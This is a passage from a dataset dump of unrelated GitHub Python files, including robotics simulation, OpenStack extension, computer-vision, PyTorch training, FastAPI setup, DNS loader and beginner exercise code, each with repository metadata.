self.ur5_episode_memories):\n m.add_action(action)\n if self.centralized_critic:\n for this_ur5, memory in zip(self.active_ur5s,\n self.ur5_episode_memories):\n # Sort actions based on base distance\n pos = np.array(this_ur5.get_pose()[0])\n sorted_ur5s = [(action, ur5) for action, ur5 in\n zip(actions, self.active_ur5s)\n if np.linalg.norm(\n pos - np.array(ur5.get_pose()[0]))\n < 2 * self.workspace_radius]\n # Sort by base distance, furthest to closest\n sorted_ur5s.sort(reverse=True, key=lambda item:\n np.linalg.norm(\n pos - np.array(item[1].get_pose()[0])))\n sorted_actions = [action for (action, ur5) in sorted_ur5s]\n # Last aciton is self, set to zero\n sorted_actions[-1] = torch.FloatTensor([0.]*6)\n # concat actions to previous observations\n critic_obs = []\n for obs, action in zip(\n memory.data['observations'][-1],\n sorted_actions):\n critic_obs.append(torch.cat((obs, action)))\n memory.data['critic_observations'].append(\n torch.stack(critic_obs))\n # also update next_observations\n if len(memory.data['critic_next_observations']):\n memory.data['critic_next_observations'][-1] = \\\n memory.data['critic_observations'][-1]\n self.action_to_robots(actions)\n\n def action_to_robots(self, actions):\n if len(actions) != len(self.active_ur5s):\n print(\"Wrong action dimensions: {} (received) vs {} (correct)\"\n .format(len(actions), len(self.active_ur5s)))\n for line in traceback.format_stack():\n print(line.strip())\n exit()\n for ur5, action in zip(self.active_ur5s, actions):\n if type(action) != np.ndarray:\n action = action.data.numpy()\n if self.action_type == 'delta':\n ur5.control_arm_joints_delta(action)\n elif self.action_type == 'target-norm':\n ur5.control_arm_joints_norm(action)\n else:\n print(\"[BaseEnv] Unsupported action type:\", self.action_type)\n\n def preprocess_obs(self, obs):\n output = []\n for ur5_obs in obs['ur5s']:\n ur5_output = np.array([])\n for key in self.obs_key:\n key = key.split('_high_freq')[0]\n item = ur5_obs[key]\n for history_frame in item:\n ur5_output = np.concatenate((\n ur5_output,\n history_frame))\n output.append(ur5_output)\n output = torch.FloatTensor(output)\n if self.centralized_policy:\n output = output.view(-1)\n return output\n\n def setup_ray(self, id):\n print(\"[BaseEnv] Setting up ray: {}\".format(id))\n self.ray_id = {\"val\": id}\n\n # Call backs\n def on_setup(self, env_config, training_config):\n pass\n\n def on_collision(self):\n visualize_collision = False\n if visualize_collision:\n self.visualize_collision()\n\n if self.terminate_on_collision:\n self.terminate_episode = True\n\n def visualize_collision(self):\n if self.gui:\n points = set([ur5.prev_collided_with[5]\n for ur5 in self.active_ur5s\n if ur5.prev_collided_with])\n sphere_vs_id = p.createVisualShape(\n p.GEOM_SPHERE,\n radius=0.05,\n rgbaColor=(1, 0, 0, 0.5))\n point_visuals = [p.createMultiBody(\n basePosition=point,\n baseCollisionShapeIndex=-1,\n baseVisualShapeIndex=sphere_vs_id)\n for point in points]\n input('\\tCollision: Press ENTER to continue')\n for point_visual in point_visuals:\n p.removeBody(point_visual)\n\n def on_step_simulation(self, curr, max, state):\n \"\"\"\n :param curr: current simulation step in episode\n :param max: maximum number of simulation steps in episode\n :param state: full state of environment at curr time\n :return: None\n \"\"\"\n for i, ur5 in enumerate(self.active_ur5s):\n if state['ur5s'][i]['colliding']:\n self.stats['collisions'][i] += + 1\n self.task_manager.set_timer(curr / max)\n\n def on_reset(self):\n pass\n\n def on_all_ur5s_reach_target(self):\n self.stats[\"collective_reach_count\"] += 1\n self.terminate_episode = self.terminate_episode or\\\n self.terminate_on_collectively_reach_target\n self.finish_task_in_episode = True\n\n def on_target_reach(self, ur5, idx):\n ur5.on_touch_target()\n self.task_manager.targets_visuals[idx].touched()\n self.stats[\"reached\"][self.active_ur5s.index(ur5)] += 1\n if self.stop_ur5_after_reach:\n ur5.control_arm_joints(ur5.get_arm_joint_values())\n\n def set_level(self, level):\n if self.curriculum is None:\n return\n if not (level < len(self.curriculum['levels'])):\n return\n elif self.curriculum_level >= level:\n return\n for level_idx in range(self.curriculum_level + 1, level + 1):\n level_config = self.curriculum['levels'][level_idx]\n updated_stats = {}\n for key in level_config:\n if key == 'position_tolerance':\n self.position_tolerance = level_config[key]\n elif key == 'orientation_tolerance':\n self.orientation_tolerance = level_config[key]\n elif key == 'collision_penalty':\n self.collision_penalty = level_config[key]\n elif key == 'max_task_ur5s_count':\n self.max_task_ur5s_count = level_config[key]\n elif key == 'max_task_difficulty':\n self.max_task_difficulty = level_config[key]\n elif key == 'min_task_difficulty':\n self.min_task_difficulty = level_config[key]\n updated_stats[key] = level_config[key]\n output = '[BaseEnv] Level {} '.format(level_idx)\n for key in updated_stats:\n output += '| {}: {}'.format(\n key, updated_stats[key])\n print(output)\n self.curriculum_level = level\n\n\n@ ray.remote\nclass ParallelBaseEnv(BaseEnv):\n def __init__(self, env_config, training_config, gui, logger):\n super().__init__(env_config, training_config, gui, logger)\n","repo_name":"columbia-ai-robotics/decentralized-multiarm","sub_path":"environment/baseEnv.py","file_name":"baseEnv.py","file_ext":"py","file_size_in_byte":32600,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"53"} +{"seq_id":"4263877281","text":"from nova.api.openstack import extensions\nfrom nova.api.openstack import wsgi\nfrom nova.api.openstack import xmlutil\n\nauthorize = extensions.soft_extension_authorizer('compute',\n 'extended_powervm')\n\n\nclass ExtendedPowerVMAttributesController(wsgi.Controller):\n\n def gen_pvc_key(self, key):\n self.LOCAL_PVC_PREFIX = 'powervm:'\n if key is None:\n return key\n if key.startswith(self.LOCAL_PVC_PREFIX):\n return key\n return self.LOCAL_PVC_PREFIX + key\n\n def _extend_server(self, context, server, instance):\n metadata = instance['metadata']\n pvc_attrs = ['cpus', 'min_cpus', 'max_cpus', 'cpu_utilization',\n 'min_vcpus', 'max_vcpus',\n 'min_memory_mb', 'max_memory_mb',\n 'root_gb']\n\n key = \"%s:id\" % (Extended_powervm.alias)\n if 'pvc_id' in metadata:\n server[key] = metadata['pvc_id']\n\n key = \"%s:health_status\" % (Extended_powervm.alias)\n health_status = {}\n att = self.gen_pvc_key('health_status.health_value')\n if att in metadata:\n health_status['health_value'] = metadata[att]\n del metadata[att]\n # TODO:Here can add other health_status property to construct\n # dictionary data\n server[key] = health_status\n\n for item in pvc_attrs:\n key = \"%s:%s\" % (Extended_powervm.alias, item)\n att = self.gen_pvc_key(item)\n if att in metadata:\n value = metadata[att]\n server[key] = value\n del metadata[att]\n\n @wsgi.extends\n def show(self, req, resp_obj, id):\n context = req.environ['nova.context']\n if authorize(context):\n # Attach our slave template to the response object\n resp_obj.attach(xml=ExtendedPowervmTemplate())\n server = resp_obj.obj['server']\n db_instance = req.get_db_instance(server['id'])\n # server['id'] is guaranteed to be in the cache due to\n # the core API adding it in its 'show' method.\n self._extend_server(context, server, db_instance)\n\n @wsgi.extends\n def detail(self, req, resp_obj):\n context = req.environ['nova.context']\n if authorize(context):\n # Attach our slave template to the response object\n resp_obj.attach(xml=ExtendedPowervmsTemplate())\n\n servers = list(resp_obj.obj['servers'])\n for server in servers:\n db_instance = req.get_db_instance(server['id'])\n # server['id'] is guaranteed to be in the cache due to\n # the core API adding it in its 'detail' method.\n self._extend_server(context, server, db_instance)\n\n\nclass Extended_powervm(extensions.ExtensionDescriptor):\n \"\"\"Extended Server Attributes support.\"\"\"\n name = \"ExtendedPowervm\"\n alias = \"IBM-PVM\"\n namespace = (\"http://docs.openstack.org/compute/ext/\"\n \"extended_powervm/api/v1.1\")\n updated = \"2011-11-03T00:00:00+00:00\"\n\n def get_controller_extensions(self):\n controller = ExtendedPowerVMAttributesController()\n extension = extensions.ControllerExtension(self, 'servers', controller)\n return [extension]\n\n\ndef make_server(elem):\n elem.set('{%s}id' % Extended_powervm.namespace,\n '%s:id' % Extended_powervm.alias)\n\n elem.set('{%s}cpus' % Extended_powervm.namespace,\n '%s:cpus' % Extended_powervm.alias)\n elem.set('{%s}max_cpus' % Extended_powervm.namespace,\n '%s:max_cpus' % Extended_powervm.alias)\n elem.set('{%s}min_cpus' % Extended_powervm.namespace,\n '%s:min_cpus' % Extended_powervm.alias)\n elem.set('{%s}cpu_utilization' % Extended_powervm.namespace,\n '%s:cpu_utilization' % Extended_powervm.alias)\n\n elem.set('{%s}min_vcpus' % Extended_powervm.namespace,\n '%s:min_vcpus' % Extended_powervm.alias)\n elem.set('{%s}max_vcpus' % Extended_powervm.namespace,\n '%s:max_vcpus' % Extended_powervm.alias)\n\n elem.set('{%s}min_memory_mb' % Extended_powervm.namespace,\n '%s:min_memory_mb' % Extended_powervm.alias)\n elem.set('{%s}max_memory_mb' % Extended_powervm.namespace,\n '%s:max_memory_mb' % Extended_powervm.alias)\n\n elem.set('{%s}root_gb' % Extended_powervm.namespace,\n '%s:root_gb' % Extended_powervm.alias)\n elem.set('{%s}health_status' % Extended_powervm.namespace,\n '%s:health_status' % Extended_powervm.alias)\n\n\nclass ExtendedPowervmTemplate(xmlutil.TemplateBuilder):\n def construct(self):\n root = xmlutil.TemplateElement('server', selector='server')\n make_server(root)\n alias = Extended_powervm.alias\n namespace = Extended_powervm.namespace\n return xmlutil.SlaveTemplate(root, 1, nsmap={alias: namespace})\n\n\nclass ExtendedPowervmsTemplate(xmlutil.TemplateBuilder):\n def construct(self):\n root = xmlutil.TemplateElement('servers')\n elem = xmlutil.SubTemplateElement(root, 'server', selector='servers')\n make_server(elem)\n alias = Extended_powervm.alias\n namespace = Extended_powervm.namespace\n return xmlutil.SlaveTemplate(root, 1, nsmap={alias: namespace})\n","repo_name":"Gokulk7/PowerVC-Drivers-clone","sub_path":"nova-powervc/powervc/nova/extension/extended_powervm.py","file_name":"extended_powervm.py","file_ext":"py","file_size_in_byte":5324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"664288756","text":"from engine.blocks.block import pyblock, PyBlockDefinition, collect_blocks\nfrom engine.blocks.fields import Variable\nfrom engine.blocks.inputs import InputValue\nfrom engine.executor.context import Context\nfrom engine.executor.variable_reference import VariableRef\n\noperator_color = \"#59C059\"\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"trim %1\",\n arguments=[\n InputValue(name=\"STRING\")\n ],\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\ndef string_trim(context: Context, string: str):\n return str(string).strip()\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"split %1 on %2 to %3\",\n arguments=[\n InputValue(name=\"STRING\"),\n InputValue(name=\"CHARS\"),\n Variable(name=\"VARIABLE\", variable=\"list\", variableTypes=[\"list\"])\n ],\n has_next_statement=True,\n has_previous_statement=True,\n color=operator_color\n )\n)\nasync def string_splitvar(context: Context, string: str, chars: str, variable: VariableRef):\n context.set_variable(variable, str(string).split(str(chars)))\n await context.next()\n\n# Deprecated\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"split %1 on newline to %3\",\n arguments=[\n InputValue(name=\"STRING\"),\n Variable(name=\"VARIABLE\", variable=\"list\", variableTypes=[\"list\"])\n ],\n has_next_statement=True,\n has_previous_statement=True,\n color=operator_color\n )\n)\nasync def string_splitvarnewline(context: Context, string: str, variable: VariableRef):\n context.set_variable(variable, str(string).split(\"\\n\"))\n await context.next()\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"join %1 with %2\",\n arguments=[\n Variable(name=\"VARIABLE\", variable=\"list\", variableTypes=[\"list\"]),\n InputValue(name=\"CHARS\"),\n ],\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\nasync def string_join(context: Context, variable: VariableRef, chars: str):\n var_value: list[str] = context.get_variable(variable)\n if type(var_value) != list:\n var_value = list(var_value)\n return str(chars).join(var_value)\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"newline\",\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\ndef string_newline(context: Context):\n return \"\\n\"\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"split %1 on %2\",\n arguments=[\n InputValue(name=\"STRING\"),\n InputValue(name=\"CHARS\")\n ],\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\ndef string_split(context: Context, string: str, chars: str):\n return str(string).split(str(chars))\n\n\n@pyblock(\n category=\"operators\",\n definition=PyBlockDefinition(\n title=\"substring from %1 to %2 of %3\",\n arguments=[\n InputValue(name=\"START\"),\n InputValue(name=\"END\"),\n InputValue(name=\"STRING\")\n ],\n color=operator_color,\n extensions=[\"output_string\"]\n )\n)\ndef string_substring(context: Context, string: str, start: int, end: int):\n return str(string)[int(start): int(end)]\n\n\nstrings_blocks = collect_blocks(__name__)\n","repo_name":"lDisciple/pyblock","sub_path":"engine/plugins/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28000235597","text":"from src.ObjectsStateHandler import ObjectsStateHandler\nfrom src.lib.lib import INPUT_VIDEO_LOC\nfrom src.lib.lib import SAVING_OUTPUT_VIDEO_LOC\nimport cv2\n\n\n# get video mode from user\n# if 1 is web cam\n# if 2 is offline location\ndef __get_video_mode():\n user_selected_mode = int(input(\"select your mode :\\n1 - webcam\\n2 - dataset video\\n\"))\n return user_selected_mode\n\n\n# create video writer to write whole process with it\ndef __create_video_writer():\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n # we know that the frame size width is 640 and height is 480\n # ------important reminder------- if frame size changed,note that you must change 640,480 in following sentence too\n return cv2.VideoWriter(SAVING_OUTPUT_VIDEO_LOC, fourcc, 20.0, (640, 480))\n\n\ndef main():\n # determine user desired mode\n user_selected_mode = __get_video_mode()\n\n # this piece of code is for one bug in openCV that i don't know what is it acutaly:D\n cv2.ocl.setUseOpenCL(False)\n\n # initiate falling objects state handler\n state = ObjectsStateHandler()\n # capture web cam or video photo video\n if user_selected_mode == 1:\n cap = cv2.VideoCapture(0)\n else:\n cap = cv2.VideoCapture(INPUT_VIDEO_LOC)\n\n # get video writer in 640*480 size (matches frame size)\n video_writer = __create_video_writer()\n\n # it'll count up tpo frames limit to add effect\n # after adding effect it'll again start to count\n frames_counter = 0\n frames_limit = 1\n # foreground background separator\n fgbg = cv2.createBackgroundSubtractorKNN(history=500)\n # fgbg = cv2.createBackgroundSubtractorMOG2(varThreshold=4, history=1000)\n # in web cam mode it will loop until user get tired :D\n # in offline mode it will loop until video finished\n while True:\n # read current frame\n ret, frame = cap.read()\n if not ret:\n break\n # apply foreground background subtraction\n fg_mask = fgbg.apply(frame)\n # using counter to update objects location just in one frame in each two frames for better performance(less lag)\n if frames_counter == frames_limit:\n # update frame state with falling objects using foreground mask\n state.update(frame=frame, foreground_mask=fg_mask)\n frames_counter = 0\n else:\n state.draw_objects(frame=frame)\n\n cv2.imshow(\"snowish :D\", frame) # show image with snowflakes and raindrop effect on it :D\n video_writer.write(frame)\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n # count up too frames' limit\n frames_counter += 1\n\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AradAshrafi/Motion-Detection-And-Object-Tracking","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20139493387","text":"import copy\nimport os\nimport time\nimport torch\nfrom torch import nn\n\nimport forge.experiment_tools as fet\nfrom math import cos, pi, sin\n\n# from matplotlib.lines import Line2D\n# import matplotlib.pyplot as plt\n# import numpy as np\n\n\ndef rotate(X, angle):\n rotation_matrix = torch.tensor(\n [[cos(angle), -sin(angle)], [sin(angle), cos(angle)]]\n )\n rotation = (\n rotation_matrix.unsqueeze(0).unsqueeze(0).repeat(X.shape[0], X.shape[1], 1, 1)\n )\n out = (\n rotation.view(-1, 2, 2)\n .bmm(X.unsqueeze(3).view(-1, 2, 1))\n .view(X.shape[0], X.shape[1], 2, 1)\n .squeeze(3)\n )\n return out\n\n\ndef parse_reports(report_dict):\n return {\n k: v.item() if len(v.shape) == 0 else v.detach().clone()\n for k, v in report_dict.items()\n }\n\n\ndef parse_reports_cpu(report_dict):\n return {\n k: v.item() if len(v.shape) == 0 else v.clone().cpu().numpy()\n for k, v in report_dict.items()\n }\n\n\ndef print_reports(report_dict, start_time, epoch, batch_idx, num_epochs, prefix=\"\"):\n\n reports = [\"{}:{:.06f}\".format(*item) for item in report_dict.items()]\n report_string = \", \".join(reports)\n if prefix:\n print(prefix, end=\": \")\n\n print(\n \"time {:.03f}, epoch: {} [{} / {}]: {}\".format(\n time.time() - start_time,\n epoch,\n batch_idx,\n num_epochs,\n report_string,\n )\n )\n\n\ndef log_tensorboard(writer, iteration, report_dict, prefix=\"\"):\n if prefix and not prefix.endswith(\"/\"):\n prefix = prefix + \"/\"\n\n for k, v in report_dict.items():\n writer.add_scalar(prefix + k, v, iteration)\n\n\ndef log_reports(reports_all, iteration, reports, prefix=\"\"):\n reports[\"iteration\"] = iteration\n if prefix != \"\":\n for d in reports.keys():\n reports_all[prefix + \"_\" + d].append(reports[d])\n else:\n for d in reports.keys():\n reports_all[d].append(reports[d])\n\n return reports_all\n\n\ndef get_checkpoint_iter(checkpoint_iter, checkpoint_dir):\n if checkpoint_iter != -1:\n return checkpoint_iter\n\n return max(fet.find_model_files(checkpoint_dir).keys())\n\n\ndef load_checkpoint(checkpoint_path, model, opt=None, lr_sched=None):\n print(\"Restoring checkpoint from '{}'\".format(checkpoint_path))\n checkpoint = torch.load(checkpoint_path)\n # Restore model\n model.load_state_dict(checkpoint[\"model_state_dict\"])\n\n # Restore optimizer\n if opt is not None:\n opt.load_state_dict(checkpoint[\"model_optimizer_state_dict\"])\n\n # Restore LR schedule\n if lr_sched is not None:\n lr_sched.load_state_dict(checkpoint[\"model_lr_sched_state_dict\"])\n\n # Update starting epoch\n if checkpoint[\"epoch\"] == \"final\":\n checkpoint[\"epoch\"] = 0\n start_epoch = checkpoint[\"epoch\"] + 1\n\n if hasattr(checkpoint, \"loss\"):\n loss = checkpoint[\"loss\"]\n else:\n loss = None\n\n return start_epoch, loss\n\n\ndef save_checkpoint(checkpoint_name, epoch, model, opt, lr_sched=None, loss=None):\n epoch_ckpt_file = \"{}-{}\".format(checkpoint_name, epoch)\n print(\"Saving model training checkpoint to {}\".format(epoch_ckpt_file))\n\n state = {\n \"epoch\": epoch,\n \"model_state_dict\": model.state_dict(),\n \"model_optimizer_state_dict\": opt.state_dict(),\n \"model_lr_sched_state_dict\": lr_sched.state_dict()\n if lr_sched is not None\n else None,\n }\n\n if loss is not None:\n state[\"loss\"] = loss\n\n torch.save(state, epoch_ckpt_file)\n return epoch_ckpt_file\n\n\ndef delete_checkpoint(checkpoint_name, epoch):\n epoch_ckpt_file = \"{}-{}\".format(checkpoint_name, epoch)\n os.remove(epoch_ckpt_file)\n print(\"Deleted checkpoint file at {}\".format(epoch_ckpt_file))\n\n\nclass ExponentialMovingAverage(nn.Module):\n def __init__(self, alpha=0.99, initial_value=0.0, debias=False):\n super(ExponentialMovingAverage, self).__init__()\n\n self.alpha = alpha\n self.initial_value = initial_value\n self.debias = debias\n if self.debias and self.initial_value != 0:\n raise NotImplementedError(\n \"Debiasing is implemented only for initial_value==0.\"\n )\n\n self.ema = None\n self.alpha_power = 1.0\n\n def forward(self, x):\n \"\"\"x can be a scalar, a tensor, or a dict of scalars or tensors.\"\"\"\n\n if self.ema is None:\n if isinstance(x, dict):\n self.ema = x.__class__({k: self.initial_value for k in x})\n else:\n self.ema = self.initial_value\n\n am1 = 1.0 - self.alpha\n if isinstance(x, dict):\n for k, v in x.items():\n self.ema[k] = self.ema[k] * self.alpha + v * am1\n ema = copy.deepcopy(self.ema)\n else:\n self.ema = self.ema * self.alpha + x * am1\n ema = self.ema\n\n if self.debias and self.alpha_power > 0.0:\n self.alpha_power *= self.alpha\n apm1 = 1.0 - self.alpha_power\n\n if isinstance(ema, dict):\n for k in ema:\n ema[k] /= apm1\n else:\n ema /= apm1\n\n return ema\n\n\ndef nested_to(x, device, dtype):\n \"\"\" Move a list of list of... of tensors to device\"\"\"\n try:\n x = x.to(device=device, dtype=dtype)\n return x\n except AttributeError:\n assert isinstance(x, (list, tuple))\n x = type(x)(nested_to(xx, device=device, dtype=dtype) for xx in x)\n return x\n\n\ndef param_count(model):\n total_params = sum(p.numel() for p in model.parameters())\n return total_params\n\n\ndef get_component(module, description):\n \"This is specifically to be used with module = model.predictor.net for eqv_transformer.\"\n idx = description[0]\n attrs = description[1]\n module = module[idx]\n for attr in attrs:\n module = getattr(module, attr)\n return module\n\n\ndef get_average_norm(module, p=1):\n norm = 0\n for param in module.parameters():\n norm += param.norm(p)\n return norm / param_count(module)\n\n\ndef parameter_analysis(model):\n for n, p in model.named_parameters():\n print(\n \"{:>100} {:>20}Mb {:>20}\".format(\n n, p.numel() * 4 / (1024 ** 2), p.type()\n )\n )\n print(\n \"{:>100} {:>20}Mb\".format(\n \"total parameters\",\n sum(p.numel() for p in model.parameters()) * 4 / (1024 ** 2),\n )\n )\n","repo_name":"oxcsml/lie-transformer","sub_path":"eqv_transformer/train_tools.py","file_name":"train_tools.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"34012772849","text":"import sys\nimport torch\nimport torch.nn as nn\n\nencoder_config = {\n 'base': [3, 'down', 32, 'down', 64, 'down', 128, 'down', 256, 'down', 512],\n 'A': [3, 'down', 32, 'down', 64, 'down', 128, 'down', 128, 'down', 128],\n 'B': [3, 'down', 32, 'down', 64, 'down', 64, 'down', 64, 'down', 64],\n 'C': [3, 'down', 32, 'down', 32, 'down', 32, 'down', 32, 'down', 32],\n 'D': [3, 'down', 512, 'down', 256, 'down', 128, 'down', 64, 'down', 32],\n}\n\ndecoder_config = {\n 'base':[512, 'up', 256, 'up', 128, 'up', 64, 'up', 32, 'up', 3],\n 'A': [128, 'up', 128, 'up', 128, 'up', 64, 'up', 32, 'up', 3],\n 'B': [64, 'up', 64, 'up', 64, 'up', 64, 'up', 32, 'up', 3],\n 'C': [32, 'up', 32, 'up', 32, 'up', 32, 'up', 32, 'up', 3],\n 'D': [32, 'up', 64, 'up', 128, 'up', 256, 'up', 512, 'up', 3],\n}\n\nclass AutoEncoder(nn.Module):\n def __init__(self, E_symbol, D_symbol):\n super().__init__()\n self.encoder = Encoder(encoder_config[E_symbol])\n self.decoder = Decoder(decoder_config[D_symbol])\n\n def forward(self, inputs):\n vectors = self.encoder(inputs)\n images = self.decoder(vectors)\n return images\n\n def encode(self, inputs):\n vectors = self.encoder(inputs)\n return vectors\n\n def decode(self, inputs):\n images = self.decoder(inputs)\n return images\n\nclass Encoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n layer_count = int((len(config) - 1)/2)\n layers = []\n for i in range(layer_count):\n in_c = config[2*i]\n conv_type = config[2*i + 1]\n out_c = config[2*i + 2]\n if conv_type == 'conv':\n layers.append(nn.Conv2d(in_c, out_c, lernel_size= 3, stride= 1, padding= 1))\n elif conv_type == 'down':\n layers.append(nn.Conv2d(in_c, out_c, kernel_size= 4, stride= 2, padding= 1))\n layers += [nn.BatchNorm2d(out_c), nn.ReLU(inplace= True)]\n\n self.net = nn.Sequential(*layers)\n\n def forward(self, inputs):\n out = self.net(inputs)\n out = out.view(out.size(0), -1)\n return out\n\nclass Decoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n layer_count = int((len(config) - 1)/2)\n layers = []\n for i in range(layer_count):\n in_c = config[2*i]\n conv_type = config[2*i + 1]\n out_c = config[2*i + 2]\n if conv_type == 'conv':\n layers.append(nn.Conv2d(in_c, out_c, lernel_size= 3, stride= 1, padding= 1))\n elif conv_type == 'up':\n layers.append(nn.ConvTranspose2d(in_c, out_c, kernel_size= 4, stride= 2, padding= 1))\n layers += [nn.BatchNorm2d(out_c), nn.ReLU(inplace= True)]\n \n layers[-1] = nn.Sigmoid()\n self.net = nn.Sequential(*layers)\n\n def forward(self, inputs):\n size = inputs.size()\n inputs = inputs.view(size[0], size[1], 1, 1)\n out = self.net(inputs)\n return out\n\ndef test():\n batch_size = 8\n imgs = torch.zeros(batch_size, 3, 32, 32)\n model = AutoEncoder(sys.argv[1], sys.argv[2])\n img_out = model(imgs)\n print(img_out.size())\n\ndef test2():\n img = torch.zeros(1, 3, 1, 1)\n deconv = nn.ConvTranspose2d(3, 32, kernel_size= 4, stride= 2, padding= 1)\n out = deconv(img)\n print(out.size())\n\nif __name__ == '__main__':\n test()\n","repo_name":"zhihao-lin/ML2019SPRING","sub_path":"hw7/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40307184546","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom fastapi import FastAPI, Depends\nfrom sqlalchemy.ext.declarative import declarative_base\n\nDATABASE_URL = \"postgresql://postgres:12345@localhost/Blog\"\n\nengine = create_engine(DATABASE_URL)\n\nsessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\nBase = declarative_base()\n\nrouter = FastAPI(debug=True, title=\"Blog\", description=\"\"\"\n In this Blog,\n Users \n 1. User can SignUp\n 2. User can Login to get Access Token\n 3. User can Update their details \n Blogs\n 1.User can get all blogs.\n 2.User can get a single blog.\n 3.User can post a blog.\n 4.User can update a blog.\n 5.User can delete a blog.\n \n\"\"\")\n\ndef get_session():\n session = sessionLocal()\n try:\n yield session\n finally:\n session.close()","repo_name":"M-an-o-j/fastapi_blog","sub_path":"configuration/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74254350887","text":"try:\n import urlparse\nexcept:\n import urllib.parse as urlparse\nimport json\n\nfrom pymads.sources.dns import MultiDNS\n\nfrom djdns.resolver import ResolverWrapper\n\nGLOBAL_MDNS = MultiDNS()\n\nclass DocLoader(object):\n '''\n Loads a page based on URI.\n '''\n\n def __init__(self, register_defaults = True, **kwargs):\n self.loaders = {}\n if register_defaults:\n self.register_defaults()\n self.register_dict(kwargs)\n\n def load(self, uri):\n parsed_uri = urlparse.urlparse(uri)\n scheme = parsed_uri.scheme\n\n if scheme in self.loaders:\n return self.loaders[scheme](parsed_uri)\n else:\n raise KeyError(\"No loader registered for scheme %r\" % scheme)\n\n def register_dict(self, table):\n self.loaders.update(table)\n\n def register(self, name, callback):\n self.loaders[name] = callback\n\n def register_defaults(self):\n self.register_dict({\n 'dns' : dns_loader,\n 'file' : file_loader,\n '' : file_loader,\n })\n\ndef file_loader(parsed_uri):\n return json.load(open(parsed_uri.path))\n\ndef dns_loader(parsed_uri):\n hostname = parsed_uri.hostname\n port = int(parsed_uri.port or 53)\n\n server_addr = (hostname, port)\n\n return ResolverWrapper(\n GLOBAL_MDNS.get_source(server_addr)\n )\n","repo_name":"campadrenalin/python-djdns","sub_path":"djdns/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"53"} +{"seq_id":"33591908944","text":"# //List\npet_name = [\"Rose\", \"Meow\", \"Dew\", \"kude\", \"Doggy\", \"harre\"]\n\n# print(pet_name[0])\n# print(pet_name[2:6])\n# print(pet_name.reverse())\n# print(pet_name[0].upper())\n# print(pet_name[0].title())\n# pet_name.append(\"AStro\")\n# pet_name.insert(0, \"kuku\")\n# pet_name.pop()\n# print(pet_name)\n# pet_name.clear()\n# print(pet_name)\n\n# TUPLES\n# pet_age = (1, 2, 2, 3, 4, 5, 6, 7, 8, 9, 10)\n# print(pet_age.count(2))\n# print(pet_age)\n\n# for i in range(0, 10):\n# print(i)\n\n# SETS\n# pet_food = {\"nyama\", \"kachumba\", \"liku\", \"liku\"}\n# print(pet_food)\n\n# DICTIONAR\npet_info = {\n \"name\": \"luku\",\n \"age\": 5,\n \"breed\": \"domestic long\"\n}\n# pets = dict(name=\"kudez\", age=25, breed=\"snko\")\n# print(pet_info[\"age\"])\n# print(pet_info.get(\"laugh\", \"Attribute not found\"))\n\n# FUNCTIONS\n\n\ndef pet_list(list):\n for pet in list:\n print(pet)\n\n\npet_list(pet_name)\n","repo_name":"malise5/Python","sub_path":"orm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74571769127","text":"from Date import *\n\nfile = 'birthdays.txt'\nfile = open(file)\n\nbirth = []\nfor i in file:\n birth.append(i.strip().split(\" \"))\n\n\nfor j in range(len(birth)):\n new = Date(birth[j][0], birth[j][1], birth[j][2])\n birth[j] = new\n \n \n\n \n \n\nprint(min(birth))\nprint(max(birth))\n\nmonths = []\nfor i in birth:\n months.append(i.month)\nj = max(set(months), key=months.count)\nprint(j)\nprint(month_names[int(j)])","repo_name":"sriyuthsagi/CSCI-1100-Computer-Science-I","sub_path":"Labs/Lab 9/Lab_9_3.py","file_name":"Lab_9_3.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9779404925","text":"\"\"\"\nConfiguration for pytest.\n\"\"\"\n\nimport os\nfrom dataclasses import dataclass\nfrom unittest.mock import Mock\n\nimport pytest\nfrom slack_bolt import App\nfrom slack_sdk import WebClient\n\nfrom ebmbot import settings\n\nfrom .mock_web_api_server import cleanup_mock_web_api_server, setup_mock_web_api_server\n\n\npytest.register_assert_rewrite(\"tests.assertions\")\n\n\n@pytest.fixture(autouse=True)\ndef reset_db():\n 